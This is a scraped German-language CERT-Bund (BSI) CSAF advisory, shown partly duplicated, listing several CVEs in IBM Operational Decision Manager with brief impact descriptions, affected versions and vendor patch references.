"url": "https://www.ibm.com/support/pages/node/7032928"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:6138 vom 2023-10-26",
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7105614 vom 2024-01-08",
"url": "https://www.ibm.com/support/pages/node/7105614"
}
],
"source_lang": "en-US",
"title": "IBM Operational Decision Manager: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-01-07T23:00:00.000+00:00",
"generator": {
"date": "2024-02-15T17:44:18.727+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.0"
}
},
"id": "WID-SEC-W-2023-2368",
"initial_release_date": "2023-09-14T22:00:00.000+00:00",
"revision_history": [
{
"date": "2023-09-14T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2023-10-26T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-01-07T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.10.5.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.10.5.1",
"product_id": "T029909",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.11.0.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.11.0.1",
"product_id": "T029910",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.11.0.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.11.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.11.1",
"product_id": "T029911",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.11.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.12.0",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.12.0",
"product_id": "T029912",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.12.0"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049",
"product": {
"name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049",
"product_id": "T031894",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1__if049"
}
}
}
],
"category": "product_name",
"name": "Operational Decision Manager"
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-2047",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der HttpURI-Klasse der Eclipse Jetty-Komponente. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2022-2047"
},
{
"cve": "CVE-2014-0107",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan-Java-Komponente aufgrund einer unsachgem\u00e4\u00dfen Behandlung von Ausgabeeigenschaften. Ein entfernter Angreifer kann diese Schwachstelle zur Umgehung von Sicherheitsma\u00dfnahmen ausnutzen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2014-0107"
},
{
"cve": "CVE-2022-25881",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht im Node.js http-cache-semantics-Modul aufgrund eines Denial of Service (ReDoS) durch regul\u00e4re Ausdr\u00fccke. Durch das Senden einer speziell gestalteten Regex-Eingabe unter Verwendung von Request-Header-Werten kann ein entfernter Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2022-25881"
},
{
"cve": "CVE-2022-34169",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan Java XSLT Bibliothekskomponente aufgrund eines Integer Truncation Problems bei der Verarbeitung von b\u00f6sartigen XSLT Stylesheets. Ein entfernter Angreifer kann diese Schwachstelle zur Ausf\u00fchrung von beliebigem Code ausnutzen"
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2022-34169"
},
{
"cve": "CVE-2022-41946",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Postgresql JDBC-Komponente aufgrund eines nicht eingeschr\u00e4nkten Zugriffs zum Erstellen lesbarer Dateien im TemporaryFolder. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2022-41946"
},
{
"cve": "CVE-2023-34034",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente VMware Tanzu Spring Security aufgrund einer unsachgem\u00e4\u00dfen Validierung von Benutzereingaben. Mit einer speziell gestalteten Konfiguration kann ein Angreifer diese Schwachstelle ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2023-34034"
},
{
"cve": "CVE-2023-37460",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente Plexus Archiver aufgrund der Verfolgung eines symbolischen Links in der Funktion resolveFile(). Durch Extrahieren einer speziell gestalteten Archivdatei, die einen symbolischen Link enth\u00e4lt, mit AbstractUnArchiver kann ein Angreifer diese Schwachstelle ausnutzen, um beliebigen Code auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2023-37460"
}
]
}
WID-SEC-W-2023-2368
Vulnerability from csaf_certbund
Published
2023-09-14 22:00
Modified
2024-01-07 23:00
Summary
IBM Operational Decision Manager: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM Operational Decision Manager ist Software für die Integration von Geschäftsereignissen und Geschäftsregeln, um Entscheidungen über verschiedene Prozesse und Anwendungen hinweg zu automatisieren.
Angriff
Ein entfernter authentifizierter Angreifer kann mehrere Schwachstellen in IBM Operational Decision Manager ausnutzen, um Sicherheitsmaßnahmen zu umgehen, beliebigen Code auszuführen, einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen.
Betroffene Betriebssysteme
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM Operational Decision Manager ist Software f\u00fcr die Integration von Gesch\u00e4ftsereignissen und Gesch\u00e4ftsregeln, um Entscheidungen \u00fcber verschiedene Prozesse und Anwendungen hinweg zu automatisieren.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter authentifizierter Angreifer kann mehrere Schwachstellen in IBM Operational Decision Manager ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, beliebigen Code auszuf\u00fchren, einen Denial-of-Service-Zustand zu verursachen oder vertrauliche Informationen offenzulegen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2023-2368 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-2368.json"
},
{
"category": "self",
"summary": "WID-SEC-2023-2368 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-2368"
},
{
"category": "external",
"summary": "IBM Security Bulletin - 7032928 vom 2023-09-14",
"url": "https://www.ibm.com/support/pages/node/7032928"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:6138 vom 2023-10-26",
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7105614 vom 2024-01-08",
"url": "https://www.ibm.com/support/pages/node/7105614"
}
],
"source_lang": "en-US",
"title": "IBM Operational Decision Manager: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-01-07T23:00:00.000+00:00",
"generator": {
"date": "2024-02-15T17:44:18.727+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.0"
}
},
"id": "WID-SEC-W-2023-2368",
"initial_release_date": "2023-09-14T22:00:00.000+00:00",
"revision_history": [
{
"date": "2023-09-14T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2023-10-26T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2024-01-07T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.10.5.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.10.5.1",
"product_id": "T029909",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.11.0.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.11.0.1",
"product_id": "T029910",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.11.0.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.11.1",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.11.1",
"product_id": "T029911",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.11.1"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager \u003c 8.12.0",
"product": {
"name": "IBM Operational Decision Manager \u003c 8.12.0",
"product_id": "T029912",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.12.0"
}
}
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049",
"product": {
"name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049",
"product_id": "T031894",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1__if049"
}
}
}
],
"category": "product_name",
"name": "Operational Decision Manager"
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-2047",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der HttpURI-Klasse der Eclipse Jetty-Komponente. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2022-2047"
},
{
"cve": "CVE-2014-0107",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan-Java-Komponente aufgrund einer unsachgem\u00e4\u00dfen Behandlung von Ausgabeeigenschaften. Ein entfernter Angreifer kann diese Schwachstelle zur Umgehung von Sicherheitsma\u00dfnahmen ausnutzen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2014-0107"
},
{
"cve": "CVE-2022-25881",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht im Node.js http-cache-semantics-Modul aufgrund eines Denial of Service (ReDoS) durch regul\u00e4re Ausdr\u00fccke. Durch das Senden einer speziell gestalteten Regex-Eingabe unter Verwendung von Request-Header-Werten kann ein entfernter Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2022-25881"
},
{
"cve": "CVE-2022-34169",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan Java XSLT Bibliothekskomponente aufgrund eines Integer Truncation Problems bei der Verarbeitung von b\u00f6sartigen XSLT Stylesheets. Ein entfernter Angreifer kann diese Schwachstelle zur Ausf\u00fchrung von beliebigem Code ausnutzen"
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2022-34169"
},
{
"cve": "CVE-2022-41946",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Postgresql JDBC-Komponente aufgrund eines nicht eingeschr\u00e4nkten Zugriffs zum Erstellen lesbarer Dateien im TemporaryFolder. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2022-41946"
},
{
"cve": "CVE-2023-34034",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente VMware Tanzu Spring Security aufgrund einer unsachgem\u00e4\u00dfen Validierung von Benutzereingaben. Mit einer speziell gestalteten Konfiguration kann ein Angreifer diese Schwachstelle ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2023-34034"
},
{
"cve": "CVE-2023-37460",
"notes": [
{
"category": "description",
"text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente Plexus Archiver aufgrund der Verfolgung eines symbolischen Links in der Funktion resolveFile(). Durch Extrahieren einer speziell gestalteten Archivdatei, die einen symbolischen Link enth\u00e4lt, mit AbstractUnArchiver kann ein Angreifer diese Schwachstelle ausnutzen, um beliebigen Code auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T031894",
"67646"
]
},
"release_date": "2023-09-14T22:00:00Z",
"title": "CVE-2023-37460"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.